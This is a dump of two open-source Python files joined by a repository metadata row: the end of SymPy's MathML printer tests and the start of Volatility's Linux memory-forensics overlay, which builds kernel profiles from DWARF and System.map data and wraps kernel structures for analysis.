    assert nodes[1].childNodes[0].nodeValue == '1.0'
    assert nodes[2].childNodes[0].nodeValue == 'x'
def test_mathml_functions():
    """Function application and (partial) derivatives print as <apply>."""
    mml_1 = mp._print(sin(x))
    assert mml_1.nodeName == 'apply'
    assert mml_1.childNodes[0].nodeName == 'sin'
    assert mml_1.childNodes[1].nodeName == 'ci'

    # Single-variable derivative uses <diff/> with a bound variable.
    mml_2 = mp._print(diff(sin(x), x, evaluate=False))
    assert mml_2.nodeName == 'apply'
    assert mml_2.childNodes[0].nodeName == 'diff'
    assert mml_2.childNodes[1].nodeName == 'bvar'
    assert mml_2.childNodes[1].childNodes[
        0].nodeName == 'ci'  # below bvar there's <ci>x/ci>

    # Multivariate expressions use <partialdiff/> instead.
    mml_3 = mp._print(diff(cos(x*y), x, evaluate=False))
    assert mml_3.nodeName == 'apply'
    assert mml_3.childNodes[0].nodeName == 'partialdiff'
    assert mml_3.childNodes[1].nodeName == 'bvar'
    assert mml_3.childNodes[1].childNodes[
        0].nodeName == 'ci'  # below bvar there's <ci>x/ci>
def test_mathml_limits():
    # XXX No unevaluated limits
    lim_fun = sin(x)/x
    children = mp._print(Limit(lim_fun, x, 0)).childNodes
    for child, tag in zip(children, ['limit', 'bvar', 'lowlimit']):
        assert child.nodeName == tag
    # The limand itself is reproduced verbatim as the last child.
    assert children[3].toxml() == mp._print(lim_fun).toxml()
def test_mathml_integrals():
    """A definite integral prints as int/bvar/lowlimit/uplimit/integrand."""
    integrand = x
    children = mp._print(Integral(integrand, (x, 0, 1))).childNodes
    for child, tag in zip(children, ['int', 'bvar', 'lowlimit', 'uplimit']):
        assert child.nodeName == tag
    assert children[4].toxml() == mp._print(integrand).toxml()
def test_mathml_sums():
    """A Sum prints as sum/bvar/lowlimit/uplimit/summand."""
    summand = x
    children = mp._print(Sum(summand, (x, 1, 10))).childNodes
    for child, tag in zip(children, ['sum', 'bvar', 'lowlimit', 'uplimit']):
        assert child.nodeName == tag
    assert children[4].toxml() == mp._print(summand).toxml()
def test_mathml_tuples():
    """Python lists print as a MathML <list> of <cn> children."""
    single = mp._print([2])
    assert single.nodeName == 'list'
    assert single.childNodes[0].nodeName == 'cn'
    assert len(single.childNodes) == 1

    pair = mp._print([2, Integer(1)])
    assert pair.nodeName == 'list'
    assert pair.childNodes[0].nodeName == 'cn'
    assert pair.childNodes[1].nodeName == 'cn'
    assert len(pair.childNodes) == 2
def test_mathml_add():
    """Subtraction inside a sum appears as a nested <minus/> apply."""
    mml = mp._print(x**5 - x**4 + x)
    first_term = mml.childNodes[1]
    assert mml.childNodes[0].nodeName == 'plus'
    assert first_term.childNodes[0].nodeName == 'minus'
    assert first_term.childNodes[1].nodeName == 'apply'
def test_mathml_Rational():
    """Integral rationals collapse to a bare <cn>; proper fractions
    use <divide/>."""
    whole = mp._print(Rational(1, 1))
    assert whole.nodeName == 'cn'
    fraction = mp._print(Rational(2, 5))
    assert fraction.childNodes[0].nodeName == 'divide'
def test_mathml_constants():
    """Named constants map onto their dedicated MathML elements."""
    element_cases = [
        (I, 'imaginaryi'),
        (E, 'exponentiale'),
        (oo, 'infinity'),
        (pi, 'pi'),
    ]
    for const, tag in element_cases:
        assert mp._print(const).nodeName == tag
    assert mathml(GoldenRatio) == '<cn>φ</cn>'
    assert mathml(EulerGamma) == '<eulergamma/>'
def test_mathml_trig():
    """Each trig / inverse / hyperbolic function prints under its tag."""
    cases = [
        (sin, 'sin'), (cos, 'cos'), (tan, 'tan'),
        (asin, 'arcsin'), (acos, 'arccos'), (atan, 'arctan'),
        (sinh, 'sinh'), (cosh, 'cosh'), (tanh, 'tanh'),
        (asinh, 'arcsinh'), (atanh, 'arctanh'), (acosh, 'arccosh'),
    ]
    for fn, tag in cases:
        assert mp._print(fn(x)).childNodes[0].nodeName == tag
def test_mathml_relational():
    """Relationals print as <apply> with the operator then both operands."""
    cases = [
        (Eq(x, 1), 'eq', [('ci', 'x'), ('cn', '1')]),
        (Ne(1, x), 'neq', [('cn', '1'), ('ci', 'x')]),
        (Ge(1, x), 'geq', [('cn', '1'), ('ci', 'x')]),
        (Lt(1, x), 'lt', [('cn', '1'), ('ci', 'x')]),
    ]
    for expr, op_tag, operands in cases:
        mml = mp._print(expr)
        assert mml.nodeName == 'apply'
        assert mml.childNodes[0].nodeName == op_tag
        for node, (tag, text) in zip(mml.childNodes[1:], operands):
            assert node.nodeName == tag
            assert node.childNodes[0].nodeValue == text
def test_symbol():
    """Symbols with ^ / _ / __ markup render as mml sub/superscripts."""

    def _leaf(node, tag, value):
        # A single presentation element wrapping one text node.
        assert node.nodeName == tag
        assert node.childNodes[0].nodeValue == value

    def _script(sym_name, tag, parts):
        # The <ci> wraps one msub/msup/msubsup whose children are either a
        # plain mml:mi (str part) or an mml:mrow of mi/mo/mi (tuple part).
        mml = mp._print(Symbol(sym_name))
        assert mml.nodeName == 'ci'
        script = mml.childNodes[0]
        assert script.nodeName == tag
        for child, part in zip(script.childNodes, parts):
            if isinstance(part, tuple):
                assert child.nodeName == 'mml:mrow'
                _leaf(child.childNodes[0], 'mml:mi', part[0])
                _leaf(child.childNodes[1], 'mml:mo', part[1])
                _leaf(child.childNodes[2], 'mml:mi', part[2])
            else:
                _leaf(child, 'mml:mi', part)

    # Plain symbol: bare <ci>x</ci>.
    mml = mp._print(Symbol("x"))
    assert mml.nodeName == 'ci'
    assert mml.childNodes[0].nodeValue == 'x'

    # '^' and '__' both mean superscript; '_' means subscript.
    _script("x^2", 'mml:msup', ['x', '2'])
    _script("x__2", 'mml:msup', ['x', '2'])
    _script("x_2", 'mml:msub', ['x', '2'])
    # Combined sub+super: msubsup lists subscript before superscript.
    _script("x^3_2", 'mml:msubsup', ['x', '2', '3'])
    _script("x__3_2", 'mml:msubsup', ['x', '2', '3'])
    # Multiple scripts of one kind collapse into an mrow '2 a'.
    _script("x_2_a", 'mml:msub', ['x', ('2', ' ', 'a')])
    _script("x^2^a", 'mml:msup', ['x', ('2', ' ', 'a')])
    _script("x__2__a", 'mml:msup', ['x', ('2', ' ', 'a')])
def test_mathml_greek():
    """Greek symbol names render as the corresponding Greek letters."""
    mml = mp._print(Symbol('alpha'))
    assert mml.nodeName == 'ci'
    assert mml.childNodes[0].nodeValue == u('\N{GREEK SMALL LETTER ALPHA}')

    lowercase = [
        ('alpha', 'α'), ('beta', 'β'), ('gamma', 'γ'), ('delta', 'δ'),
        ('epsilon', 'ε'), ('zeta', 'ζ'), ('eta', 'η'), ('theta', 'θ'),
        ('iota', 'ι'), ('kappa', 'κ'), ('lambda', 'λ'), ('mu', 'μ'),
        ('nu', 'ν'), ('xi', 'ξ'), ('omicron', 'ο'), ('pi', 'π'),
        ('rho', 'ρ'), ('varsigma', 'ς'), ('sigma', 'σ'), ('tau', 'τ'),
        ('upsilon', 'υ'), ('phi', 'φ'), ('chi', 'χ'), ('psi', 'ψ'),
        ('omega', 'ω'),
    ]
    uppercase = [
        ('Alpha', 'Α'), ('Beta', 'Β'), ('Gamma', 'Γ'), ('Delta', 'Δ'),
        ('Epsilon', 'Ε'), ('Zeta', 'Ζ'), ('Eta', 'Η'), ('Theta', 'Θ'),
        ('Iota', 'Ι'), ('Kappa', 'Κ'), ('Lambda', 'Λ'), ('Mu', 'Μ'),
        ('Nu', 'Ν'), ('Xi', 'Ξ'), ('Omicron', 'Ο'), ('Pi', 'Π'),
        ('Rho', 'Ρ'), ('Sigma', 'Σ'), ('Tau', 'Τ'), ('Upsilon', 'Υ'),
        ('Phi', 'Φ'), ('Chi', 'Χ'), ('Psi', 'Ψ'), ('Omega', 'Ω'),
    ]
    for name, letter in lowercase + uppercase:
        assert mp.doprint(Symbol(name)) == '<ci>%s</ci>' % letter
def test_mathml_order():
    """The printer honours the 'order' setting for polynomial terms."""
    expr = x**3 + x**2*y + 3*x*y**3 + y**4
    # order -> (base/exponent at child 1, base/exponent at child 4)
    expectations = [
        ('lex', ('x', '3'), ('y', '4')),
        ('rev-lex', ('y', '4'), ('x', '3')),
    ]
    for order, (base1, exp1), (base2, exp2) in expectations:
        printer = MathMLPrinter({'order': order})
        mml = printer._print(expr)
        assert mml.childNodes[1].childNodes[0].nodeName == 'power'
        assert mml.childNodes[1].childNodes[1].childNodes[0].data == base1
        assert mml.childNodes[1].childNodes[2].childNodes[0].data == exp1
        assert mml.childNodes[4].childNodes[0].nodeName == 'power'
        assert mml.childNodes[4].childNodes[1].childNodes[0].data == base2
        assert mml.childNodes[4].childNodes[2].childNodes[0].data == exp2
def test_settings():
    # Unknown printer settings must raise TypeError rather than be ignored.
    raises(TypeError, lambda: mathml(Symbol("x"), method="garbage"))
def test_toprettyxml_hooking():
    # test that the patch doesn't influence the behavior of the standard library
    import xml.dom.minidom
    document = xml.dom.minidom.parseString(
        "<apply><plus/><ci>x</ci><cn>1</cn></apply>")
    before_patch = document.toprettyxml()
    mp.apply_patch()
    mp.restore_patch()
    assert before_patch == document.toprettyxml()
| bsd-3-clause |
Alwnikrotikz/volatility | volatility/plugins/overlays/linux/linux.py | 44 | 37298 | # Volatility
# Copyright (C) 2010 Brendan Dolan-Gavitt
# Copyright (c) 2011 Michael Cohen <scudette@gmail.com>
#
# This file is part of Volatility.
#
# Volatility is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# Volatility is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Volatility. If not, see <http://www.gnu.org/licenses/>.
#
"""
@author: Brendan Dolan-Gavitt
@license: GNU General Public License 2.0
@contact: brendandg@gatech.edu
@organization: Georgia Institute of Technology
"""
import os, struct, socket
import copy
import zipfile
import volatility.plugins
import volatility.plugins.overlays.basic as basic
import volatility.plugins.overlays.native_types as native_types
import volatility.exceptions as exceptions
import volatility.obj as obj
import volatility.debug as debug
import volatility.dwarf as dwarf
import volatility.plugins.linux.common as linux_common
import volatility.plugins.linux.flags as linux_flags
import volatility.addrspace as addrspace
import volatility.utils as utils
import volatility.protos as protos
# Linux x86_64 uses 8-byte (unsigned) longs: clone the generic x64 native
# type table and widen 'long'/'unsigned long' to little-endian 64-bit.
x64_native_types = copy.deepcopy(native_types.x64_native_types)
x64_native_types['long'] = [8, '<q']
x64_native_types['unsigned long'] = [8, '<Q']
class LinuxPermissionFlags(basic.Flags):
    """A Flags object for printing vm_area_struct permissions
    in a format like rwx or r-x"""

    def __str__(self):
        """Render the flag value as a fixed-order string such as 'r-x'."""
        result = []
        value = self.v()
        # FIX: the old `keys = self.bitmap.keys(); keys.sort()` breaks on
        # Python 3 (dict views have no .sort()); sorted() works everywhere
        # and still yields the stable 'r','w','x' order.
        for k in sorted(self.bitmap):
            if value & (1 << self.bitmap[k]):
                result.append(k)
            else:
                result.append('-')
        return ''.join(result)

    def is_flag(self, flag):
        """Return a truthy value when *flag* (e.g. 'x') is set."""
        return self.v() & (1 << self.bitmap[flag])

    def is_executable(self):
        return self.is_flag('x')

    def is_readable(self):
        return self.is_flag('r')

    def is_writable(self):
        return self.is_flag('w')
# Overlay applied on top of the DWARF-derived Linux vtypes: turns fixed-size
# char arrays into String objects, wires hlist heads to their node type, and
# registers the Volatility magic / address-space validity checks.
linux_overlay = {
    'task_struct' : [None, {
        'comm' : [ None , ['String', dict(length = 16)]],
        }],
    'in_ifaddr' : [None, {
        'ifa_label' : [ None , ['String', dict(length = 16)]],
        }],
    'module' : [None, {
        'name' : [ None , ['String', dict(length = 60)]],
        }],
    'super_block' : [None, {
        's_id' : [ None , ['String', dict(length = 32)]],
        }],
    'net_device' : [None, {
        'name' : [ None , ['String', dict(length = 16)]],
        }],
    'sockaddr_un' : [None, {
        'sun_path' : [ None , ['String', dict(length = 108)]],
        }],
    'hlist_head' : [None, {
        'first' : [ None , ['pointer', ['hlist_node']]],
        }],
    'tty_struct' : [None, {
        'name' : [ None , ['String', dict(length = 64)]],
        }],
    'dentry' : [None, {
        'd_u' : [ None , ['list_head', {}]],
        }],
    'VOLATILITY_MAGIC': [None, {
        'DTB' : [ 0x0, ['VolatilityDTB', dict(configname = "DTB")]],
        'ArmValidAS' : [ 0x0, ['VolatilityLinuxARMValidAS']],
        'IA32ValidAS' : [ 0x0, ['VolatilityLinuxIntelValidAS']],
        'AMD64ValidAS' : [ 0x0, ['VolatilityLinuxIntelValidAS']],
        }],
    'vm_area_struct' : [ None, {
        'vm_flags' : [ None, ['LinuxPermissionFlags', {'bitmap': {'r': 0, 'w': 1, 'x': 2}}]],
        'vm_end' : [ None , ['unsigned long']],
        'vm_start' : [ None , ['unsigned long']],
        }],
    }

# Intel-specific additions: fixed-length identification strings on cpuinfo_x86.
intel_overlay = {
    'cpuinfo_x86' : [None, {
        'x86_model_id' : [ None , ['String', dict(length = 64)]],
        'x86_vendor_id' : [ None, ['String', dict(length = 16)]],
        }],
    }
def parse_system_map(data, module):
    """Parse a System.map-style symbol listing.

    Args:
        data: the System.map file contents as a string (one
            "address type name" triple per line).
        module: key under which symbols are filed (e.g. "kernel").

    Returns:
        (arch, mem_model, sys_map): arch is "x86", "x64" or "ARM";
        mem_model is "32bit"/"64bit" (None when no valid line was seen);
        sys_map maps module -> symbol name -> list of [address, nm-type].
    """
    sys_map = {}
    sys_map[module] = {}

    mem_model = None
    arch = "x86"

    # get the system map
    for line in data.splitlines():
        try:
            (str_addr, symbol_type, symbol) = line.strip().split()
        except ValueError:
            # Not an "addr type name" triple; skip blank/odd lines.
            continue

        try:
            # FIX: int() transparently promotes on Python 2 and also works on
            # Python 3, where the old long() builtin no longer exists.
            sym_addr = int(str_addr, 16)
        except ValueError:
            continue

        # The presence of this symbol marks an ARM kernel.
        if symbol == "arm_syscall":
            arch = "ARM"

        sys_map[module].setdefault(symbol, []).append([sym_addr, symbol_type])

        # The address width in hex digits reveals the memory model.
        mem_model = str(len(str_addr) * 4) + "bit"

    if mem_model == "64bit" and arch == "x86":
        arch = "x64"

    return arch, mem_model, sys_map
def LinuxProfileFactory(profpkg):
    """ Takes in a zip file, spits out a LinuxProfile class

        The zipfile should include at least one .dwarf file
        and the appropriate system.map file.

        To generate a suitable dwarf file:
        dwarfdump -di vmlinux > output.dwarf

        Returns None when the archive is missing either input.
    """

    dwarfdata = None
    sysmapdata = None

    # XXX Do we want to initialize this
    memmodel, arch = "32bit", "x86"
    profilename = os.path.splitext(os.path.basename(profpkg.filename))[0]

    for f in profpkg.filelist:
        if f.filename.lower().endswith('.dwarf'):
            dwarfdata = profpkg.read(f.filename)
        elif 'system.map' in f.filename.lower():
            sysmapdata = profpkg.read(f.filename)
            arch, memmodel, sysmap = parse_system_map(profpkg.read(f.filename), "kernel")

    if memmodel == "64bit":
        arch = "x64"

    if not sysmapdata or not dwarfdata:
        # Might be worth throwing an exception here?
        return None

    class AbstractLinuxProfile(obj.Profile):
        __doc__ = "A Profile for Linux " + profilename + " " + arch
        _md_os = "linux"
        _md_memory_model = memmodel
        _md_arch = arch
        # Override 64-bit native_types
        native_mapping = {'32bit': native_types.x86_native_types,
                          '64bit': x64_native_types}

        def __init__(self, *args, **kwargs):
            # change the name to catch any code referencing the old hash table
            self.sys_map = {}
            obj.Profile.__init__(self, *args, **kwargs)

        def clear(self):
            """Clear out the system map, and everything else"""
            self.sys_map = {}
            obj.Profile.clear(self)

        def reset(self):
            """Reset the vtypes, sysmap and apply modifications, then compile"""
            self.clear()
            self.load_vtypes()
            self.load_sysmap()
            self.load_modifications()
            self.compile()

        def _merge_anonymous_members(self, vtypesvar):
            """Fold '__unnamed_*' (anonymous struct/union) members into their
            parent type, shifting the imported members by the anonymous
            member's own offset."""
            members_index = 1
            types_index = 1
            offset_index = 0

            try:
                for candidate in vtypesvar:
                    done = False
                    while not done:
                        if any(member.startswith('__unnamed_') for member in vtypesvar[candidate][members_index]):
                            for member in vtypesvar[candidate][members_index].keys():
                                if member.startswith('__unnamed_'):
                                    member_type = vtypesvar[candidate][members_index][member][types_index][0]
                                    location = vtypesvar[candidate][members_index][member][offset_index]
                                    vtypesvar[candidate][members_index].update(vtypesvar[member_type][members_index])
                                    for name in vtypesvar[member_type][members_index].keys():
                                        vtypesvar[candidate][members_index][name][offset_index] += location
                                    del vtypesvar[candidate][members_index][member]
                            # Don't update done because we'll need to check if any
                            # of the newly imported types need merging
                        else:
                            done = True
            except KeyError as e:
                # FIX: 'as' syntax is Python-3 safe, and the leftover
                # `import pdb; pdb.set_trace()` debugging hook was removed.
                raise exceptions.VolatilityException("Inconsistent linux profile - unable to look up " + str(e))

        def load_vtypes(self):
            """Loads up the vtypes data"""
            ntvar = self.metadata.get('memory_model', '32bit')
            self.native_types = copy.deepcopy(self.native_mapping.get(ntvar))

            vtypesvar = dwarf.DWARFParser(dwarfdata).finalize()
            self._merge_anonymous_members(vtypesvar)
            self.vtypes.update(vtypesvar)
            # NOTE(review): `f` here is the factory's leftover loop variable
            # (last zip member) -- it works via the closure but is fragile.
            debug.debug("{2}: Found dwarf file {0} with {1} symbols".format(f.filename, len(vtypesvar.keys()), profilename))

        def load_sysmap(self):
            """Loads up the system map data"""
            arch, _memmodel, sysmapvar = parse_system_map(sysmapdata, "kernel")
            debug.debug("{2}: Found system file {0} with {1} symbols".format(f.filename, len(sysmapvar.keys()), profilename))

            self.sys_map.update(sysmapvar)

        def get_all_symbols(self, module = "kernel"):
            """ Gets all the symbol tuples for the given module """
            ret = []

            symtable = self.sys_map

            if module in symtable:
                mod = symtable[module]

                for (name, addrs) in mod.items():
                    ret.append(addrs)
            else:
                debug.info("All symbols requested for non-existent module %s" % module)

            return ret

        def get_all_addresses(self, module = "kernel"):
            """ Gets all the symbol addresses for the given module """
            # returns a hash table for quick looks
            # the main use of this function is to see if an address is known
            ret = {}

            symbols = self.get_all_symbols(module)

            for sym in symbols:
                for (addr, addrtype) in sym:
                    ret[addr] = 1

            return ret

        def get_symbol_by_address(self, module, sym_address):
            """Reverse lookup: symbol name for *sym_address*, '' if unknown."""
            ret = ""
            symtable = self.sys_map

            mod = symtable[module]

            for (name, addrs) in mod.items():
                for (addr, addr_type) in addrs:
                    if sym_address == addr:
                        ret = name
                        break

            return ret

        def get_all_symbol_names(self, module = "kernel"):
            symtable = self.sys_map

            if module in symtable:
                ret = symtable[module].keys()
            else:
                # debug.error aborts execution, so ret is never read unbound.
                debug.error("get_all_symbol_names called on non-existent module")

            return ret

        def get_next_symbol_address(self, sym_name, module = "kernel"):
            """
            This is used to find the address of the next symbol in the profile
            For some data structures, we cannot determine their size automaticlaly so this
            can be used to figure it out on the fly
            """
            high_addr = 0xffffffffffffffff
            table_addr = self.get_symbol(sym_name, module = module)

            addrs = self.get_all_addresses(module = module)

            for addr in addrs.keys():
                if table_addr < addr < high_addr:
                    high_addr = addr

            return high_addr

        def get_symbol(self, sym_name, nm_type = "", module = "kernel"):
            """Gets a symbol out of the profile

            sym_name -> name of the symbol
            nm_tyes -> types as defined by 'nm' (man nm for examples)
            module -> which module to get the symbol from, default is kernel, otherwise can be any name seen in 'lsmod'

            This fixes a few issues from the old static hash table method:
            1) Conflicting symbols can be handled, if a symbol is found to conflict on any profile,
               then the plugin will need to provide the nm_type to differentiate, otherwise the plugin will be errored out
            2) Can handle symbols gathered from modules on disk as well from the static kernel

            symtable is stored as a hash table of:
            symtable[module][sym_name] = [(symbol address, symbol type), (symbol addres, symbol type), ...]

            The function has overly verbose error checking on purpose...
            """
            symtable = self.sys_map

            ret = None

            # check if the module is there...
            if module in symtable:

                mod = symtable[module]

                # check if the requested symbol is in the module
                if sym_name in mod:

                    sym_list = mod[sym_name]

                    # if a symbol has multiple definitions, then the plugin needs to specify the type
                    if len(sym_list) > 1:
                        if nm_type == "":
                            debug.error("Requested symbol {0:s} in module {1:s} has multiple definitions and no type given\n".format(sym_name, module))
                        else:
                            for (addr, stype) in sym_list:
                                if stype == nm_type:
                                    ret = addr
                                    break

                            # FIX: identity comparison with None ('is None'),
                            # not equality.
                            if ret is None:
                                debug.error("Requested symbol {0:s} in module {1:s} could not be found\n".format(sym_name, module))
                    else:
                        # get the address of the symbol
                        ret = sym_list[0][0]
                else:
                    debug.debug("Requested symbol {0:s} not found in module {1:s}\n".format(sym_name, module))
            else:
                debug.info("Requested module {0:s} not found in symbol table\n".format(module))

            return ret

    cls = AbstractLinuxProfile
    cls.__name__ = 'Linux' + profilename.replace('.', '_') + arch

    return cls
################################
# Track down the zip files
# Push them through the factory
# Check whether ProfileModifications will work

new_classes = []

for path in set(volatility.plugins.__path__):
    # NOTE: the walk variable is named dirpath so it no longer shadows the
    # outer 'path' being walked.
    for dirpath, _, files in os.walk(path):
        for fn in files:
            if zipfile.is_zipfile(os.path.join(dirpath, fn)):
                # FIX: LinuxProfileFactory returns None for archives missing a
                # .dwarf or System.map -- don't register those.
                profile_cls = LinuxProfileFactory(zipfile.ZipFile(os.path.join(dirpath, fn)))
                if profile_cls is not None:
                    new_classes.append(profile_cls)
################################
# really 'file' but don't want to mess with python's version
class linux_file(obj.CType):
    """Wrapper for the kernel's struct file (named linux_file to avoid
    shadowing Python's builtin 'file')."""

    @property
    def dentry(self):
        # Older kernels keep the dentry directly on the file; newer ones
        # reach it through the embedded f_path.
        return self.f_dentry if hasattr(self, "f_dentry") else self.f_path.dentry

    @property
    def vfsmnt(self):
        # Same kernel-version split for the vfsmount pointer.
        return self.f_vfsmnt if hasattr(self, "f_vfsmnt") else self.f_path.mnt
# FIXME - walking backwards has not been thorougly tested
class hlist_node(obj.CType):
    """A hlist_node makes a doubly linked list."""
    def list_of_type(self, obj_type, member, offset = -1, forward = True, head_sentinel = True):
        """Walk the hlist, yielding each object that embeds a node.

        obj_type/member: containing type and the field name of this node.
        offset: NOTE(review): ignored -- it is unconditionally recomputed
            from the profile below; confirm whether honouring a caller value
            was ever intended.
        forward: follow .next when True, otherwise walk back via .pprev.
        head_sentinel: when True, this head node itself is not yielded.
        """
        if not self.is_valid():
            return

        ## Get the first element
        if forward:
            nxt = self.next.dereference()
        else:
            nxt = self.pprev.dereference().dereference()

        offset = self.obj_vm.profile.get_obj_offset(obj_type, member)

        seen = set()
        if head_sentinel:
            # We're a header element and not to be included in the list
            seen.add(self.obj_offset)

        # Stop on an invalid pointer or once the list cycles back on itself.
        while nxt.is_valid() and nxt.obj_offset not in seen:

            ## Instantiate the object
            item = obj.Object(obj_type, offset = nxt.obj_offset - offset,
                              vm = self.obj_vm,
                              parent = self.obj_parent,
                              name = obj_type)

            seen.add(nxt.obj_offset)

            yield item

            if forward:
                nxt = item.m(member).next.dereference()
            else:
                nxt = item.m(member).pprev.dereference().dereference()

    def __nonzero__(self):
        ## List entries are valid when both Flinks and Blink are valid
        return bool(self.next) or bool(self.pprev)

    def __iter__(self):
        # Default iteration: walk siblings of the parent object's type.
        return self.list_of_type(self.obj_parent.obj_name, self.obj_name)
class list_head(obj.CType):
    """A list_head makes a doubly linked list."""
    def list_of_type(self, obj_type, member, offset = -1, forward = True, head_sentinel = True):
        """Yield each `obj_type` object linked into this list via `member`.

        NOTE(review): the `offset` parameter is unconditionally overwritten
        below, so callers cannot actually override it — confirm intent.
        """
        if not self.is_valid():
            return
        ## Get the first element
        if forward:
            nxt = self.next.dereference()
        else:
            nxt = self.prev.dereference()
        # container_of(): subtracting this offset converts a node address
        # into the address of its enclosing structure.
        offset = self.obj_vm.profile.get_obj_offset(obj_type, member)
        seen = set()
        if head_sentinel:
            # We're a header element and not to be included in the list
            seen.add(self.obj_offset)
        # `seen` guards against cycles in corrupt/partial memory images.
        while nxt.is_valid() and nxt.obj_offset not in seen:
            ## Instantiate the object
            item = obj.Object(obj_type, offset = nxt.obj_offset - offset,
                              vm = self.obj_vm,
                              parent = self.obj_parent,
                              name = obj_type)
            seen.add(nxt.obj_offset)
            yield item
            if forward:
                nxt = item.m(member).next.dereference()
            else:
                nxt = item.m(member).prev.dereference()
    def __nonzero__(self):
        ## List entries are valid when both Flinks and Blink are valid
        # (Python 2 truth protocol.)
        return bool(self.next) or bool(self.prev)
    def __iter__(self):
        # Iterate objects of the parent's type linked through this member.
        return self.list_of_type(self.obj_parent.obj_name, self.obj_name)
class files_struct(obj.CType):
    """Wrapper for the per-task open-files table."""

    def get_fds(self):
        # Newer kernels hang the fd array off an fdtable ('fdt');
        # older ones keep it directly on files_struct.
        if hasattr(self, "fdt"):
            return self.fdt.fd.dereference()
        return self.fd.dereference()

    def get_max_fds(self):
        # Same old/new layout split as get_fds().
        if hasattr(self, "fdt"):
            return self.fdt.max_fds
        return self.max_fds
class kernel_param(obj.CType):
    """Wrapper for 'struct kernel_param' across layout changes."""

    @property
    def get(self):
        # Older kernels store the getter function pointer directly;
        # newer ones moved it into the 'ops' table.
        return self.m("get") if self.members.get("get") else self.ops.get
class kparam_array(obj.CType):
    """Wrapper for 'struct kparam_array' across layout changes."""

    @property
    def get(self):
        # Mirrors kernel_param: a direct 'get' member on old kernels,
        # an 'ops' table on newer ones.
        return self.m("get") if self.members.get("get") else self.ops.get
class gate_struct64(obj.CType):
    """64-bit IDT gate descriptor."""

    @property
    def Address(self):
        # The handler address is split across three fields; reassemble
        # it: high:32, middle:16, low:16.
        return (self.offset_high << 32) | (self.offset_middle << 16) | self.offset_low
class desc_struct(obj.CType):
    """32-bit descriptor-table entry."""

    @property
    def Address(self):
        # Combine the high half of 'b' with the low half of 'a'.
        high_part = self.b & 0xffff0000
        low_part = self.a & 0x0000ffff
        return high_part | low_part
class module_sect_attr(obj.CType):
    def get_name(self):
        """Return the section name.

        Older kernels store the name as an inline char array; newer ones
        store a pointer to a string, so dereference accordingly.
        """
        # Hoist the duplicated self.m("name") lookup; use isinstance()
        # rather than an exact type() comparison — the idiomatic test,
        # which also tolerates Array subclasses.
        name_member = self.m("name")
        if isinstance(name_member, obj.Array):
            return obj.Object("String", offset = name_member.obj_offset, vm = self.obj_vm, length = 32)
        return self.name.dereference_as("String", length = 255)
class inet_sock(obj.CType):
    """Class for an internet socket object"""
    # NOTE(review): references to self.sk.__sk_common below are subject to
    # Python class-private name mangling; presumably volatility's attribute
    # lookup compensates — confirm before touching these accesses.
    @property
    def protocol(self):
        """Return the protocol string (i.e. IPv4, IPv6)"""
        return protos.protos.get(self.sk.sk_protocol.v(), "UNKNOWN")
    @property
    def state(self):
        # Map the numeric TCP state onto its symbolic name.
        state = self.sk.__sk_common.skc_state #pylint: disable-msg=W0212
        return linux_flags.tcp_states[state]
    @property
    def src_port(self):
        # Member name changed across kernel versions; ports are stored in
        # network byte order, hence htons().
        if hasattr(self, "sport"):
            return socket.htons(self.sport)
        elif hasattr(self, "inet_sport"):
            return socket.htons(self.inet_sport)
        else:
            return None
    @property
    def dst_port(self):
        # Same version-dependent member naming as src_port, with a third
        # fallback into sk.__sk_common on the newest layouts.
        if hasattr(self, "dport"):
            return socket.htons(self.dport)
        elif hasattr(self, "inet_dport"):
            return socket.htons(self.inet_dport)
        elif hasattr(self, "sk") and hasattr(self.sk, "__sk_common") and hasattr(self.sk.__sk_common, "skc_dport"):
            return self.sk.__sk_common.skc_dport
        else:
            return None
    @property
    def src_addr(self):
        """Source address, as IpAddress (v4) or Ipv6Address (v6)."""
        if self.sk.__sk_common.skc_family == socket.AF_INET:
            # FIXME: Consider using kernel version metadata rather than checking hasattr
            if hasattr(self, "rcv_saddr"):
                saddr = self.rcv_saddr
            elif hasattr(self, "inet_rcv_saddr"):
                saddr = self.inet_rcv_saddr
            else:
                saddr = self.sk.__sk_common.skc_rcv_saddr
            return saddr.cast("IpAddress")
        else:
            return self.pinet6.saddr.cast("Ipv6Address")
    @property
    def dst_addr(self):
        """Destination address, as IpAddress (v4) or Ipv6Address (v6)."""
        if self.sk.__sk_common.skc_family == socket.AF_INET:
            # FIXME: Consider using kernel version metadata rather than checking hasattr
            if hasattr(self, "daddr") and self.daddr:
                daddr = self.daddr
            elif hasattr(self, "inet_daddr") and self.inet_daddr:
                daddr = self.inet_daddr
            else:
                daddr = self.sk.__sk_common.skc_daddr
            return daddr.cast("IpAddress")
        else:
            return self.pinet6.daddr.cast("Ipv6Address")
class tty_ldisc(obj.CType):
    """Wrapper for the tty line discipline structure."""

    @property
    def ops(self):
        # Newer kernels split the operations into a separate 'ops'
        # member; older ones keep them on the tty_ldisc itself, in which
        # case this object stands in for its own ops table.
        return self.m('ops') if self.members.get("ops") else self
class in_device(obj.CType):
    """Wrapper for 'struct in_device' (per-interface IPv4 state)."""

    def devices(self):
        """Walk the ifa_list chain, yielding each valid address entry."""
        node = self.ifa_list
        # Keep '!= None' rather than 'is not None': volatility NoneObjects
        # compare equal to None without being the None singleton.
        while node != None and node.is_valid():
            yield node
            node = node.ifa_next
class net_device(obj.CType):
    """Wrapper for 'struct net_device'."""

    @property
    def mac_addr(self):
        """Hardware (MAC) address as a colon-separated hex string."""
        # dict.has_key() was removed in Python 3; the 'in' operator is
        # equivalent and also works on Python 2.
        if "perm_addr" in self.members:
            hwaddr = self.perm_addr
        else:
            hwaddr = self.dev_addr
        # Only the first 6 bytes form the MAC address.
        macaddr = ":".join(["{0:02x}".format(x) for x in hwaddr][:6])
        return macaddr

    @property
    def promisc(self):
        """True when the interface has promiscuous mode enabled."""
        return self.flags & 0x100 == 0x100 # IFF_PROMISC
class task_struct(obj.CType):
    # Wrapper for the kernel's per-process 'task_struct'.
    def is_valid_task(self):
        """Sanity-check this task: fs/files pointers set and, where the
        kernel has a cred struct, the credentials look valid."""
        ret = self.fs.v() != 0 and self.files.v() != 0
        if ret and self.members.get("cred"):
            ret = self.cred.is_valid()
        return ret
    @property
    def uid(self):
        # Older kernels keep uid on the task; newer ones moved it to cred.
